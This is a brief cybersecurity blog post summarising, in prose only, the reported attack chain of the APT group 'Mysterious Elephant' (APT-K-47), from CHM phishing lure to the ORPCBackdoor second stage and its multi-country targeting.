Cybersecurity · · 3 min read

APT-K-47 "Mysterious Elephant": A New APT Organization in South Asia

APT-K-47 "Mysterious Elephant": A New APT Organization in South Asia

In the dynamic battlefield of cyberspace, the emergence of new Advanced Persistent Threats (APTs) is a relentless challenge. APT-K-47, dubbed "Mysterious Elephant," has recently surfaced in South Asia, particularly targeting Pakistan. This blog post unravels the intricate details of this new APT organization, offering insights into its tactics, techniques, and procedures (TTPs).

The Anatomy of the Attack Chain

The attack chain of APT-K-47, known as "Mysterious Elephant," is a masterclass in precision and stealth. This section dissects the various stages of the attack, from the initial bait to the final strike, providing a comprehensive view of how this new APT organization in South Asia orchestrates its cyber onslaught.

Phishing Email: The Bait

The attack commences with a phishing email containing a CHM file, masquerading as content from the "Russia-China Committee for Friendship, Peace, and Development."

Malicious CHM File: The Hook

The CHM file's malicious component, doc.html, creates a scheduled task running every 15 minutes, downloading and executing a second-order malicious program.

Second-Order Attack: The Strike

The second-order MSI file harbors a black file (ORPCBackdoor) and a white file (Microsoft's official service file), with the latter launching the former.

Multi-Country Targeting: The Scope

Contrary to initial reports, the attack targets multiple countries, not just Pakistan, as evidenced by the phishing file's content and Knownsec's remote sensing mapping big data.

Read next